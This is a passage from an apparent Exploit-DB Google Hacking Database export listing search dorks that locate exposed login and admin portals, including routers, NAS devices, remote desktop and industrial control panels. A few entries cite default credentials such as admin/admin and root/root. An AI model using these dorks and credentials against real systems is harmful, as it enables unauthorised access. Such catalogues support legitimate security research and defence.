<querystring>https://www.google.com/search?q=intitle:&quot;PBX Login&quot; -inurl:pbx|pbxlogin -.com</querystring>
<edb></edb>
<date>2021-08-23</date>
<author>s Thakur</author>
</entry>
<entry>
<id>5761</id>
<link>https://www.exploit-db.com/ghdb/5761</link>
<category>Pages Containing Login Portals</category>
<shortDescription>intitle:&quot;Pentaho User Console - Login&quot;</shortDescription>
<textualDescription>This dork finds Pentaho login page.
intitle:&quot;Pentaho User Console - Login&quot;
inurl:/pentaho/Login
- Pomodori
</textualDescription>
<query>intitle:&quot;Pentaho User Console - Login&quot;</query>
<querystring>https://www.google.com/search?q=intitle:&quot;Pentaho User Console - Login&quot;</querystring>
<edb></edb>
<date>2020-03-02</date>
<author>Pomodori</author>
</entry>
<entry>
<id>5671</id>
<link>https://www.exploit-db.com/ghdb/5671</link>
<category>Pages Containing Login Portals</category>
<shortDescription>intitle:&quot;Pfsense - Login&quot;</shortDescription>
<textualDescription>Google Dork : intitle:&quot;Pfsense - Login&quot;
This dork found pfsense login panel.
Berat İşler (root1x)
</textualDescription>
<query>intitle:&quot;Pfsense - Login&quot;</query>
<querystring>https://www.google.com/search?q=intitle:&quot;Pfsense - Login&quot;</querystring>
<edb></edb>
<date>2019-12-20</date>
<author>berat isler</author>
</entry>
<entry>
<id>567</id>
<link>https://www.exploit-db.com/ghdb/567</link>
<category>Pages Containing Login Portals</category>
<shortDescription>intitle:&quot;Philex 0.2*&quot; -script -site:freelists.org</shortDescription>
<textualDescription>Philex (phile 'file' explorer) is a web content manager based php what philex can do ? - easy navigation with tree structure - create, delete, rename, copy and move folders/files. - download files (normal or compressed :zip, gz, bz ). - download many files as one compressed file. - send files by email. - upload local files to server</textualDescription>
<query>intitle:&quot;Philex 0.2*&quot; -script -site:freelists.org</query>
<querystring>https://www.google.com/search?q=intitle%3A%22Philex+0.2*%22+-script+-site%3Afreelists.org</querystring>
<edb></edb>
<date>2004-10-14</date>
<author>anonymous</author>
</entry>
<entry>
<id>722</id>
<link>https://www.exploit-db.com/ghdb/722</link>
<category>Pages Containing Login Portals</category>
<shortDescription>intitle:&quot;PHP Advanced Transfer&quot; inurl:&quot;login.php&quot;</shortDescription>
<textualDescription>PHP Advacaned Transfer is GPL'd software that claims to be the &quot;The ultimate PHP download &amp; upload manager&quot;. This is a search for the login pages.</textualDescription>
<query>intitle:&quot;PHP Advanced Transfer&quot; inurl:&quot;login.php&quot;</query>
<querystring>https://www.google.com/search?num=50&amp;q=intitle%3A%22PHP+Advanced+Transfer%22+inurl%3A%22login.php%22</querystring>
<edb></edb>
<date>2004-11-28</date>
<author>anonymous</author>
</entry>
<entry>
<id>635</id>
<link>https://www.exploit-db.com/ghdb/635</link>
<category>Pages Containing Login Portals</category>
<shortDescription>intitle:&quot;php icalendar administration&quot; -site:sourceforge.net</shortDescription>
<textualDescription>PHP iCalendar is a php-based iCal file parser. Its based on v2.0 of the IETF spec. It displays iCal files in a nice logical, clean manner with day, week, month, and year navigation.This reveals the administration interface.</textualDescription>
<query>intitle:&quot;php icalendar administration&quot; -site:sourceforge.net</query>
<querystring>https://www.google.com/search?q=intitle%3A%22php+icalendar+administration%22+-site%3Asourceforge.net</querystring>
<edb></edb>
<date>2004-10-31</date>
<author>anonymous</author>
</entry>
<entry>
<id>638</id>
<link>https://www.exploit-db.com/ghdb/638</link>
<category>Pages Containing Login Portals</category>
<shortDescription>intitle:&quot;php icalendar administration&quot; -site:sourceforge.net</shortDescription>
<textualDescription>This is the adminstration login portal search for PHP iCalendar. It is compatible with Evolution and clients for other platforms. Admin uuthentication has two choices, FTP and Internal. For the latter the defaults are &quot;admin/admin&quot;.There is also a more generic search in the GHDB that an attacker use and then modify to ../admin.php to reach the adminstration pages. Access to adminstration allows an attacker to upload new ICS files or delete present ones.</textualDescription>
<query>intitle:&quot;php icalendar administration&quot; -site:sourceforge.net</query>
<querystring>https://www.google.com/search?q=intitle%3A%22php+icalendar+administration%22+-site%3Asourceforge.net</querystring>
<edb></edb>
<date>2004-10-31</date>
<author>anonymous</author>
</entry>
<entry>
<id>6770</id>
<link>https://www.exploit-db.com/ghdb/6770</link>
<category>Pages Containing Login Portals</category>
<shortDescription>intitle:&quot;phpLDAPadmin&quot; inurl:cmd.php</shortDescription>
<textualDescription># Dork : intitle:&quot;phpLDAPadmin&quot; inurl:cmd.php
# PhpLdapAdmin Server Login Portals
# Author : Ambadi MP
</textualDescription>
<query>intitle:&quot;phpLDAPadmin&quot; inurl:cmd.php</query>
<querystring>https://www.google.com/search?q=intitle:&quot;phpLDAPadmin&quot; inurl:cmd.php</querystring>
<edb></edb>
<date>2021-02-01</date>
<author>Ambadi MP</author>
</entry>
<entry>
<id>684</id>
<link>https://www.exploit-db.com/ghdb/684</link>
<category>Pages Containing Login Portals</category>
<shortDescription>intitle:&quot;phpPgAdmin - Login&quot; Language</shortDescription>
<textualDescription>phpPgAdmin is a web-based administration tool for PostgreSQL. It is perfect for PostgreSQL DBAs, newbies and hosting services</textualDescription>
<query>intitle:&quot;phpPgAdmin - Login&quot; Language</query>
<querystring>https://www.google.com/search?q=intitle:%22phpPgAdmin+-+Login%22+Language&amp;c2coff=1&amp;start=10&amp;sa=N</querystring>
<edb></edb>
<date>2005-03-03</date>
<author>anonymous</author>
</entry>
<entry>
<id>1121</id>
<link>https://www.exploit-db.com/ghdb/1121</link>
<category>Pages Containing Login Portals</category>
<shortDescription>intitle:&quot;PHProjekt - login&quot; login password</shortDescription>
<textualDescription>PHProjekt is a group managing software for online calenders, chat, forums, etc. I looked around and i think the default admin login/pass is root/root. Results 1 - 23 of about 851 when i posted this</textualDescription>
<query>intitle:&quot;PHProjekt - login&quot; login password</query>
<querystring>https://www.google.com/search?q=intitle:%22PHProjekt+-+login%22+login+password&amp;num=100</querystring>
<edb></edb>
<date>2005-09-21</date>
<author>anonymous</author>
</entry>
<entry>
<id>4942</id>
<link>https://www.exploit-db.com/ghdb/4942</link>
<category>Pages Containing Login Portals</category>
<shortDescription>intitle:&quot;phpVirtualBox - VirtualBox Web Console&quot;</shortDescription>
<textualDescription># Exploit Title: Find phpVirtualBox login portail
# Google Dork: intitle:&quot;phpVirtualBox - VirtualBox Web Console&quot;
# Date: 10/09/2018
# Exploit Author: Hamoji
# Vendor Homepage: https://github.com/phpvirtualbox/phpvirtualbox
# Version: 4.3-3, 5.0-5
</textualDescription>
<query>intitle:&quot;phpVirtualBox - VirtualBox Web Console&quot;</query>
<querystring>https://www.google.com/search?q=intitle:&quot;phpVirtualBox - VirtualBox Web Console&quot;</querystring>
<edb></edb>
<date>2018-09-10</date>
<author>Hamoji</author>
</entry>
<entry>
<id>6626</id>
<link>https://www.exploit-db.com/ghdb/6626</link>
<category>Pages Containing Login Portals</category>
<shortDescription>intitle:&quot;pi-hole Admin console&quot; intext:&quot;login&quot;</shortDescription>
<textualDescription>#Google Dork: intitle:&quot;pi-hole Admin console&quot; intext:&quot;login&quot;
#Description : Various pages containing pi hole login portals.
#Date : 19/10/2020
#Exploit Author: Aninda Saha
</textualDescription>
<query>intitle:&quot;pi-hole Admin console&quot; intext:&quot;login&quot;</query>
<querystring>https://www.google.com/search?q=intitle:&quot;pi-hole Admin console&quot; intext:&quot;login&quot;</querystring>
<edb></edb>
<date>2020-10-20</date>
<author>Aninda Saha</author>
</entry>
<entry>
<id>4717</id>
<link>https://www.exploit-db.com/ghdb/4717</link>
<category>Pages Containing Login Portals</category>
<shortDescription>intitle:&quot;Please login&quot; &quot;username&quot; &quot;password&quot;</shortDescription>
<textualDescription>Many login portals
Bruno Schmid
</textualDescription>
<query>intitle:&quot;Please login&quot; &quot;username&quot; &quot;password&quot;</query>
<querystring>https://www.google.com/search?q=intitle:&quot;Please login&quot; &quot;username&quot; &quot;password&quot;</querystring>
<edb></edb>
<date>2018-03-30</date>
<author>Bruno Schmid</author>
</entry>
<entry>
<id>422</id>
<link>https://www.exploit-db.com/ghdb/422</link>
<category>Pages Containing Login Portals</category>
<shortDescription>intitle:&quot;please login&quot; &quot;your password is *&quot;</shortDescription>
<textualDescription>These administrators were friendly enough to give hints about the password.</textualDescription>
<query>intitle:&quot;please login&quot; &quot;your password is *&quot;</query>
<querystring>https://www.google.com/search?num=50&amp;q=intitle%3A%22please+login%22+%22your+password+is+*%22</querystring>
<edb></edb>
<date>2004-08-13</date>
<author>anonymous</author>
</entry>
<entry>
<id>6908</id>
<link>https://www.exploit-db.com/ghdb/6908</link>
<category>Pages Containing Login Portals</category>
<shortDescription>intitle:&quot;Please Login&quot; inurl:&quot;/remote/login?lang=en&quot;</shortDescription>
<textualDescription># Dork: intitle:&quot;Please Login&quot; inurl:&quot;/remote/login?lang=en&quot;</textualDescription>
<query>intitle:&quot;Please Login&quot; inurl:&quot;/remote/login?lang=en&quot;</query>
<querystring>https://www.google.com/search?q=intitle:&quot;Please Login&quot; inurl:&quot;/remote/login?lang=en&quot;</querystring>
<edb></edb>
<date>2021-05-03</date>
<author>J. Igor Melo</author>
</entry>
<entry>
<id>6951</id>
<link>https://www.exploit-db.com/ghdb/6951</link>
<category>Pages Containing Login Portals</category>
<shortDescription>intitle:&quot;Plesk Obsidian&quot; inurl:login_up.php</shortDescription>
<textualDescription># Dork: intitle:&quot;Plesk Obsidian&quot; inurl:login_up.php</textualDescription>
<query>intitle:&quot;Plesk Obsidian&quot; inurl:login_up.php</query>
<querystring>https://www.google.com/search?q=intitle:&quot;Plesk Obsidian&quot; inurl:login_up.php</querystring>
<edb></edb>
<date>2021-05-21</date>
<author>J. Igor Melo</author>
</entry>
<entry>
<id>4554</id>
<link>https://www.exploit-db.com/ghdb/4554</link>
<category>Pages Containing Login Portals</category>
<shortDescription>intitle:&quot;Plesk Onyx&quot; intext:&quot;Interface language&quot;</shortDescription>
<textualDescription>Dork: intitle:&quot;Plesk Onyx&quot; intext:&quot;Interface language&quot;
Description: Find Plesk Onyx login pages
Author: scumsec</textualDescription>
<query>intitle:&quot;Plesk Onyx&quot; intext:&quot;Interface language&quot;</query>
<querystring>https://www.google.com/search?q=intitle:&quot;Plesk Onyx&quot; intext:&quot;Interface language&quot;</querystring>
<edb></edb>
<date>2017-07-20</date>
<author>anonymous</author>
</entry>
<entry>
<id>7009</id>
<link>https://www.exploit-db.com/ghdb/7009</link>
<category>Pages Containing Login Portals</category>
<shortDescription>intitle:&quot;Plesk&quot; inurl:&quot;/login_up.php3&quot; &quot;Parallels IP Holdings GmbH&quot;</shortDescription>
<textualDescription># Google Dork: intitle:&quot;Plesk&quot; inurl:&quot;/login_up.php3&quot; &quot;Parallels IP
Holdings GmbH&quot;
# Pages Containing Login Portals
# Date: 21/06/2021
# Exploit Author: Mugdha Peter Bansode
</textualDescription>
<query>intitle:&quot;Plesk&quot; inurl:&quot;/login_up.php3&quot; &quot;Parallels IP Holdings GmbH&quot;</query>
<querystring>https://www.google.com/search?q=intitle:&quot;Plesk&quot; inurl:&quot;/login_up.php3&quot; &quot;Parallels IP Holdings GmbH&quot;</querystring>
<edb></edb>
<date>2021-06-25</date>
<author>Mugdha Peter Bansode</author>
</entry>
<entry>
<id>7135</id>
<link>https://www.exploit-db.com/ghdb/7135</link>
<category>Pages Containing Login Portals</category>
<shortDescription>intitle:&quot;Polycom Login&quot; inurl:&quot;/login.html&quot;</shortDescription>
<textualDescription># Google Dork: intitle:&quot;Polycom Login&quot; inurl:&quot;/login.html&quot;
# Pages Containing Login Portals
#Date: 27/08/2021
# Exploit Author: Mugdha Peter Bansode
</textualDescription>
<query>intitle:&quot;Polycom Login&quot; inurl:&quot;/login.html&quot;</query>
<querystring>https://www.google.com/search?q=intitle:&quot;Polycom Login&quot; inurl:&quot;/login.html&quot;</querystring>
<edb></edb>
<date>2021-08-27</date>
<author>Mugdha Peter Bansode</author>
</entry>
<entry>
<id>7429</id>
<link>https://www.exploit-db.com/ghdb/7429</link>
<category>Pages Containing Login Portals</category>
<shortDescription>intitle:&quot;Portal&quot; &amp; (inurl:&quot;login.asp&quot; | inurl:&quot;login.aspx&quot;)</shortDescription>
<textualDescription># Google Dork: intitle:&quot;Portal&quot; &amp; (inurl:&quot;login.asp&quot; | inurl:&quot;login.aspx&quot;)
# Pages Containing Login Portals
# Date:13/10/2021
# Exploit Author: Muhammad Ali Akbar</textualDescription>
<query>intitle:&quot;Portal&quot; &amp; (inurl:&quot;login.asp&quot; | inurl:&quot;login.aspx&quot;)</query>
<querystring>https://www.google.com/search?q=intitle:&quot;Portal&quot; &amp; (inurl:&quot;login.asp&quot; | inurl:&quot;login.aspx&quot;)</querystring>
<edb></edb>
<date>2021-10-18</date>
<author>Muhammad Ali Akbar</author>
</entry>
<entry>
<id>7457</id>
<link>https://www.exploit-db.com/ghdb/7457</link>
<category>Pages Containing Login Portals</category>
<shortDescription>intitle:&quot;Portal&quot; inurl:&quot;login.jsp&quot;</shortDescription>
<textualDescription># Google Dork: intitle:&quot;Portal&quot; inurl:&quot;login.jsp&quot;
# Pages Containing Login Portals
# Date:18/10/2021
# Exploit Author: Suman Das</textualDescription>
<query>intitle:&quot;Portal&quot; inurl:&quot;login.jsp&quot;</query>
<querystring>https://www.google.com/search?q=intitle:&quot;Portal&quot; inurl:&quot;login.jsp&quot;</querystring>
<edb></edb>
<date>2021-10-19</date>
<author>Suman Das</author>
</entry>
<entry>
<id>7430</id>
<link>https://www.exploit-db.com/ghdb/7430</link>
<category>Pages Containing Login Portals</category>
<shortDescription>intitle:&quot;Portal&quot; inurl:&quot;login.php&quot;</shortDescription>
<textualDescription># Google Dork: intitle:&quot;Portal&quot; inurl:&quot;login.php&quot;
# Pages Containing Login Portals
# Date:13/10/2021
# Exploit Author: Muhammad Ali Akbar</textualDescription>
<query>intitle:&quot;Portal&quot; inurl:&quot;login.php&quot;</query>
<querystring>https://www.google.com/search?q=intitle:&quot;Portal&quot; inurl:&quot;login.php&quot;</querystring>
<edb></edb>
<date>2021-10-18</date>
<author>Muhammad Ali Akbar</author>
</entry>
<entry>
<id>7098</id>
<link>https://www.exploit-db.com/ghdb/7098</link>
<category>Pages Containing Login Portals</category>
<shortDescription>intitle:&quot;Powered by Deepija Telecom&quot;</shortDescription>
<textualDescription># Google Dork: intitle:&quot;Powered by Deepija Telecom&quot;
# Category: Pages Containing Login Portals
# Date: 30/07/2021
# Exploit Author: s Thakur
</textualDescription>
<query>intitle:&quot;Powered by Deepija Telecom&quot;</query>
<querystring>https://www.google.com/search?q=intitle:&quot;Powered by Deepija Telecom&quot;</querystring>
<edb></edb>
<date>2021-08-23</date>
<author>s Thakur</author>
</entry>
<entry>
<id>7110</id>
<link>https://www.exploit-db.com/ghdb/7110</link>
<category>Pages Containing Login Portals</category>
<shortDescription>intitle:&quot;prestige&quot; intext:&quot;Enter Password and click Login&quot; -.com</shortDescription>
<textualDescription># Google Dork: intitle:&quot;prestige&quot; intext:&quot;Enter Password and click Login&quot; -.com
# Category: Pages Containing Login Portals
# Date: 31/07/2021
# Exploit Author: s Thakur
</textualDescription>
<query>intitle:&quot;prestige&quot; intext:&quot;Enter Password and click Login&quot; -.com</query>
<querystring>https://www.google.com/search?q=intitle:&quot;prestige&quot; intext:&quot;Enter Password and click Login&quot; -.com</querystring>
<edb></edb>
<date>2021-08-23</date>
<author>s Thakur</author>
</entry>
<entry>
<id>4723</id>
<link>https://www.exploit-db.com/ghdb/4723</link>
<category>Pages Containing Login Portals</category>
<shortDescription>intitle:&quot;private login&quot; username -github</shortDescription>
<textualDescription>Login portals to private/exclusive area
Bruno Schmid
</textualDescription>
<query>intitle:&quot;private login&quot; username -github</query>
<querystring>https://www.google.com/search?q=intitle:&quot;private login&quot; username -github</querystring>
<edb></edb>
<date>2018-04-02</date>
<author>Bruno Schmid</author>
</entry>
<entry>
<id>7109</id>
<link>https://www.exploit-db.com/ghdb/7109</link>
<category>Pages Containing Login Portals</category>
<shortDescription>intitle:&quot;Prolink&quot; inurl:login.htm -.com</shortDescription>
<textualDescription># Google Dork: intitle:&quot;Prolink&quot; inurl:login.htm -.com
# Category: Pages Containing Login Portals
# Date: 31/07/2021
# Exploit Author: s Thakur
</textualDescription>
<query>intitle:&quot;Prolink&quot; inurl:login.htm -.com</query>
<querystring>https://www.google.com/search?q=intitle:&quot;Prolink&quot; inurl:login.htm -.com</querystring>
<edb></edb>
<date>2021-08-23</date>
<author>s Thakur</author>
</entry>
<entry>
<id>7081</id>
<link>https://www.exploit-db.com/ghdb/7081</link>
<category>Pages Containing Login Portals</category>
<shortDescription>intitle:&quot;R WebServer&quot;</shortDescription>
<textualDescription># Google Dork: intitle:&quot;R WebServer&quot;
# Pages Containing Login Portals
# Date: 23/07/2021
# Exploit Author: J. Igor Melo
</textualDescription>
<query>intitle:&quot;R WebServer&quot;</query>
<querystring>https://www.google.com/search?q=intitle:&quot;R WebServer&quot;</querystring>
<edb></edb>
<date>2021-08-23</date>
<author>J. Igor Melo</author>
</entry>
<entry>
<id>5728</id>
<link>https://www.exploit-db.com/ghdb/5728</link>
<category>Pages Containing Login Portals</category>
<shortDescription>intitle:&quot;RabbitMQ Management&quot; inurl:15672</shortDescription>
<textualDescription>RabbitMQ Dashboard Logins
# Google Dork: intitle:&quot;RabbitMQ Management&quot; inurl:15672
# Date: [6-2-2020]
# Author: [Mohammed*_*]
</textualDescription>
<query>intitle:&quot;RabbitMQ Management&quot; inurl:15672</query>
<querystring>https://www.google.com/search?q=intitle:&quot;RabbitMQ Management&quot; inurl:15672</querystring>
<edb></edb>
<date>2020-02-07</date>
<author>Mohammed*_*</author>
</entry>
<entry>
<id>6790</id>
<link>https://www.exploit-db.com/ghdb/6790</link>
<category>Pages Containing Login Portals</category>
<shortDescription>intitle:&quot;Radius Manager&quot; intext:&quot;Control Panel&quot;</shortDescription>
<textualDescription># Google Dork: intitle:&quot;Radius Manager&quot; intext:&quot;Control Panel&quot;
# Find Radius ISP control panels
# Date: Feb. 8th,2020
# Author: Kike Fontan
</textualDescription>
<query>intitle:&quot;Radius Manager&quot; intext:&quot;Control Panel&quot;</query>
<querystring>https://www.google.com/search?q=intitle:&quot;Radius Manager&quot; intext:&quot;Control Panel&quot;</querystring>
<edb></edb>
<date>2021-02-11</date>
<author>Kike Fontan</author>
</entry>
<entry>
<id>6914</id>
<link>https://www.exploit-db.com/ghdb/6914</link>
<category>Pages Containing Login Portals</category>
<shortDescription>intitle:&quot;ReACT Self-serve&quot;</shortDescription>
<textualDescription># Dork: intitle:&quot;ReACT Self-serve&quot;</textualDescription>
<query>intitle:&quot;ReACT Self-serve&quot;</query>
<querystring>https://www.google.com/search?q=intitle:&quot;ReACT Self-serve&quot;</querystring>
<edb></edb>
<date>2021-05-03</date>
<author>arnydo</author>
</entry>
<entry>
<id>574</id>
<link>https://www.exploit-db.com/ghdb/574</link>
<category>Pages Containing Login Portals</category>
<shortDescription>intitle:&quot;remote assessment&quot; OpenAanval Console</shortDescription>
<textualDescription>The Aanval Intrusion Detection Console is an advanced intrusion detection monitor and alerting system. Currently supporting modules for Snort and syslog - Aanval provides real-time monitoring, reporting, alerting and stability. Aanval's web-browser interface provides real-time event viewing and system/sensor management.</textualDescription>
<query>intitle:&quot;remote assessment&quot; OpenAanval Console</query>
<querystring>https://www.google.com/search?q=%0Aintitle%3A%22remote+assessment%22+OpenAanval+Console</querystring>
<edb></edb>
<date>2004-10-16</date>
<author>anonymous</author>
</entry>
<entry>
<id>193</id>
<link>https://www.exploit-db.com/ghdb/193</link>
<category>Pages Containing Login Portals</category>
<shortDescription>intitle:&quot;Remote Desktop Web Connection&quot; inurl:tsweb</shortDescription>
<textualDescription>This is the login page for Microsoft's Remote Desktop Web Connection, which allows remote users to connect to (and optionally control) a user's desktop. Although authentication is built into this product, it is still possible to run this service without authentication. Regardless, this search serves as a footprinting mechanisms for an attacker.</textualDescription>
<query>intitle:Remote.Desktop.Web.Connection inurl:tsweb</query>
<querystring>https://www.google.com/search?q=intitle%3ARemote.Desktop.Web.Connection+inurl%3Atsweb</querystring>
<edb></edb>
<date>2004-04-28</date>
<author>anonymous</author>
</entry>
<entry>
<id>6458</id>
<link>https://www.exploit-db.com/ghdb/6458</link>
<category>Pages Containing Login Portals</category>
<shortDescription>intitle:&quot;Remote Desktop Web Connection&quot; inurl:tsweb</shortDescription>
<textualDescription>Description: intitle:&quot;Remote Desktop Web Connection&quot; inurl:tsweb
This dork gives RDP login portals.
</textualDescription>
<query>intitle:&quot;Remote Desktop Web Connection&quot; inurl:tsweb</query>
<querystring>https://www.google.com/search?q=intitle:&quot;Remote Desktop Web Connection&quot; inurl:tsweb</querystring>
<edb></edb>
<date>2020-07-29</date>
<author>Aditya Rana</author>
</entry>
<entry>
<id>7545</id>
<link>https://www.exploit-db.com/ghdb/7545</link>
<category>Pages Containing Login Portals</category>
<shortDescription>intitle:&quot;RM Portal&quot;</shortDescription>
<textualDescription># Google Dork: intitle:&quot;RM Portal&quot;
# Pages Containing Login Portals
# Date: 30/10/2021
# Exploit Author: Dennis Silva
</textualDescription>
<query>intitle:&quot;RM Portal&quot;</query>
<querystring>https://www.google.com/search?q=intitle:&quot;RM Portal&quot;</querystring>
<edb></edb>
<date>2021-11-01</date>
<author>Dennis Silva</author>
</entry>
<entry>
<id>7159</id>
<link>https://www.exploit-db.com/ghdb/7159</link>
<category>Pages Containing Login Portals</category>
<shortDescription>intitle:&quot;Router Access&quot; inurl:Router_Login.asp</shortDescription>
<textualDescription># Google Dork: intitle:&quot;Router Access&quot; inurl:Router_Login.asp
# Pages Containing Login Portals
# Date: 01/09/2021
# Exploit Author: J. Igor Melo
</textualDescription>
<query>intitle:&quot;Router Access&quot; inurl:Router_Login.asp</query>
<querystring>https://www.google.com/search?q=intitle:&quot;Router Access&quot; inurl:Router_Login.asp</querystring>
<edb></edb>
<date>2021-09-06</date>
<author>J. Igor Melo</author>
</entry>
<entry>
<id>4233</id>
<link>https://www.exploit-db.com/ghdb/4233</link>
<category>Pages Containing Login Portals</category>
<shortDescription>intitle:&quot;RouterOS&quot; intitle:&quot;configuration page&quot; intext:&quot;You have connected to a router. Administrative access only.&quot;</shortDescription>
<textualDescription>Description: RouterOS configuration &amp; login page
Google search: intitle:&quot;RouterOS&quot; intitle:&quot;configuration page&quot;
intext:&quot;You have connected to a router. Administrative access only.&quot;
Author: nebo_oben</textualDescription>
<query>intitle:&quot;RouterOS&quot; intitle:&quot;configuration page&quot; intext:&quot;You have connected to a router. Administrative access only.&quot;</query>
<querystring>https://www.google.com/search?q=intitle:&quot;RouterOS&quot; intitle:&quot;configuration page&quot; intext:&quot;You have connected to a router. Administrative access only.&quot;</querystring>
<edb></edb>
<date>2016-03-14</date>
<author>anonymous</author>
</entry>
<entry>
<id>5383</id>
<link>https://www.exploit-db.com/ghdb/5383</link>
<category>Pages Containing Login Portals</category>
<shortDescription>intitle:&quot;Sales Central - Logon&quot;</shortDescription>
<textualDescription>Login page :
intitle:&quot;Sales Central - Logon&quot;
Reza Abasi(Turku)
</textualDescription>
<query>intitle:&quot;Sales Central - Logon&quot;</query>
<querystring>https://www.google.com/search?q=intitle:&quot;Sales Central - Logon&quot;</querystring>
<edb></edb>
<date>2019-08-19</date>
<author>Reza Abasi</author>
</entry>
<entry>
<id>7919</id>
<link>https://www.exploit-db.com/ghdb/7919</link>
<category>Pages Containing Login Portals</category>
<shortDescription>intitle:&quot;SAP Web Application Server&quot; logon</shortDescription>
<textualDescription># Google Dork: intitle:&quot;SAP Web Application Server&quot; logon
# Pages Containing Login Portals
# Date:16/06/2022
# Exploit Author: Zayed AlJaberi</textualDescription>
<query>intitle:&quot;SAP Web Application Server&quot; logon</query>
<querystring>https://www.google.com/search?q=intitle:&quot;SAP Web Application Server&quot; logon</querystring>
<edb></edb>
<date>2022-06-16</date>
<author>Zayed AlJaberi</author>
</entry>
<entry>
<id>6883</id>
<link>https://www.exploit-db.com/ghdb/6883</link>
<category>Pages Containing Login Portals</category>
<shortDescription>intitle:&quot;Sauter moduWeb - Login&quot;</shortDescription>
<textualDescription># Google Dork: intitle:intitle:&quot;Sauter moduWeb - Login&quot;
# Pages Containing Login Portals
# Date: 12/04/2021
# Exploit Author: Mugdha Peter Bansode
</textualDescription>
<query>intitle:&quot;Sauter moduWeb - Login&quot;</query>
<querystring>https://www.google.com/search?q=intitle:&quot;Sauter moduWeb - Login&quot;</querystring>
<edb></edb>
<date>2021-04-19</date>
<author>Mugdha Peter Bansode</author>
</entry>
<entry>
<id>6980</id>
<link>https://www.exploit-db.com/ghdb/6980</link>
<category>Pages Containing Login Portals</category>
<shortDescription>intitle:&quot;Scalance web management&quot; &quot;Switch to insecure HTTP&quot;</shortDescription>
<textualDescription># Google Dork: intitle:&quot;Scalance web management&quot; &quot;Switch to insecure HTTP&quot;
# Various Online Devices
# Date: 29/04/2021
# Exploit Author: Mugdha Peter Bansode
</textualDescription>
<query>intitle:&quot;Scalance web management&quot; &quot;Switch to insecure HTTP&quot;</query>
<querystring>https://www.google.com/search?q=intitle:&quot;Scalance web management&quot; &quot;Switch to insecure HTTP&quot;</querystring>
<edb></edb>
<date>2021-06-03</date>
<author>Mugdha Peter Bansode</author>
</entry>
<entry>
<id>7005</id>
<link>https://www.exploit-db.com/ghdb/7005</link>
<category>Pages Containing Login Portals</category>
<shortDescription>intitle:&quot;Schneider Electric Telecontrol - Industrial Web Control&quot; intext:&quot;Xflow &quot;</shortDescription>
<textualDescription># Google Dork: intitle:&quot;Schneider Electric Telecontrol - Industrial Web Control&quot; intext:&quot;Xflow&quot;
# Pages Containing Login Portals
# Date: 07/06/2021
# Exploit Author: Mugdha Peter Bansode
</textualDescription>
<query>intitle:&quot;Schneider Electric Telecontrol - Industrial Web Control&quot; intext:&quot;Xflow &quot;</query>
<querystring>https://www.google.com/search?q=intitle:&quot;Schneider Electric Telecontrol - Industrial Web Control&quot; intext:&quot;Xflow &quot;</querystring>
<edb></edb>
<date>2021-06-11</date>
<author>Mugdha Peter Bansode</author>
</entry>
<entry>
<id>7108</id>
<link>https://www.exploit-db.com/ghdb/7108</link>
<category>Pages Containing Login Portals</category>
<shortDescription>intitle:&quot;Seagate NAS -&quot; &quot;login&quot; intext:&quot;Language.&quot; -.com</shortDescription>
<textualDescription># Google Dork: intitle:&quot;Seagate NAS -&quot; &quot;login&quot; intext:&quot;Language.&quot; -.com
# Category: Pages Containing Login Portals
# Date: 30/07/2021
# Exploit Author: s Thakur
</textualDescription>
<query>intitle:&quot;Seagate NAS -&quot; &quot;login&quot; intext:&quot;Language.&quot; -.com</query>
<querystring>https://www.google.com/search?q=intitle:&quot;Seagate NAS -&quot; &quot;login&quot; intext:&quot;Language.&quot; -.com</querystring>
<edb></edb>
<date>2021-08-23</date>
<author>s Thakur</author>
</entry>
<entry>
<id>951</id>
<link>https://www.exploit-db.com/ghdb/951</link>
<category>Pages Containing Login Portals</category>
<shortDescription>intitle:&quot;SFXAdmin - sfx_global&quot; | intitle:&quot;SFXAdmin - sfx_local&quot; | intitle:&quot;SFXAdmin - sfx_test&quot;</shortDescription>
<textualDescription>Just another logon page search, this one is for SFXÂî, a link server from Ex Libris, delivers linking services in the scholarly information environment. SFX is also a component in the management of electronic resources in a library.</textualDescription>
<query>intitle:&quot;SFXAdmin - sfx_global&quot; | intitle:&quot;SFXAdmin - sfx_local&quot; | intitle:&quot;SFXAdmin - sfx_test&quot;</query>
<querystring>https://www.google.com/search?q=intitle:%22SFXAdmin+-+sfx_global%22+%7C+intitle:%22SFXAdmin+-+sfx_local%22+%7C+intitle:%22SFXAdmin+-+sfx_test%22&amp;num=100&amp;c2coff=1&amp;safe=off&amp;filter=0</querystring>
<edb></edb>
<date>2005-04-27</date>
<author>anonymous</author>
</entry>
<entry>
<id>6449</id>
<link>https://www.exploit-db.com/ghdb/6449</link>
<category>Pages Containing Login Portals</category>
<shortDescription>intitle:&quot;SFXAdmin&quot; intext:&quot;Login Form&quot;</shortDescription>
<textualDescription># Google Dork: intitle:&quot;SFXAdmin&quot; intext:&quot;Login Form&quot;
# Various pages containing login portals.
# Date: 3/07/2020
# Exploit Author: Alexandros Pappas
</textualDescription>
<query>intitle:&quot;SFXAdmin&quot; intext:&quot;Login Form&quot;</query>
<querystring>https://www.google.com/search?q=intitle:&quot;SFXAdmin&quot; intext:&quot;Login Form&quot;</querystring>
<edb></edb>
<date>2020-07-26</date>
<author>Alexandros Pappas</author>
</entry>
<entry>
<id>1362</id>
<link>https://www.exploit-db.com/ghdb/1362</link>
<category>Pages Containing Login Portals</category>
<shortDescription>intitle:&quot;SHOUTcast Administrator&quot; inurl:admin.cgi</shortDescription>
<textualDescription>Login pages for SHOUTcast&quot;SHOUTcast is a free-of-charge audio homesteading solution. It permits anyone on the internet to broadcast audio from their PC to listeners across the Internet or any other IP-based network (Office LANs, college campuses, etc.).SHOUTcast's underlying technology for audio delivery is MPEG Layer 3, also known as MP3 technology. The SHOUTcast system can deliver audio in a live situation, or can deliver audio on-demand for archived broadcasts. &quot;</textualDescription>
<query>intitle:&quot;SHOUTcast Administrator&quot; inurl:admin.cgi</query>
<querystring>https://www.google.com/search?num=100&amp;safe=off&amp;q=intitle%3A%22SHOUTcast+Administrator%22+inurl%3Aadmin.cgi</querystring>
<edb></edb>
<date>2006-05-03</date>
<author>anonymous</author>
</entry>
<entry>
<id>6118</id>
<link>https://www.exploit-db.com/ghdb/6118</link>
<category>Pages Containing Login Portals</category>
<shortDescription>intitle:&quot;ShowIt-Admin&quot;</shortDescription>
<textualDescription># Google Dork: intitle:&quot;ShowIt-Admin&quot;
# ShowIt configuration panels.
# Date: 22/05/2020
# Author: Alexandros Pappas
</textualDescription>
<query>intitle:&quot;ShowIt-Admin&quot;</query>
<querystring>https://www.google.com/search?q=intitle:&quot;ShowIt-Admin&quot;</querystring>
<edb></edb>
